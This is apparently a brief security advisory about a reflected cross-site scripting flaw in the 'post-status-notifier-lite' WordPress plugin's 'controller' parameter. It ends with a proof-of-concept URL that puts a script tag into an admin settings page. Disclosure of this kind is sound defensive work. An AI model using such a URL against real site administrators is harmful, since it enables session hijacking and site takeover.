The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high privilege users such as admin.
Make a logged in high privilege user such as admin open the URL below
https://example.com/wp-admin/options-general.php?page=post-status-notifier-lite&controller=<script>alert(`xss`)</script>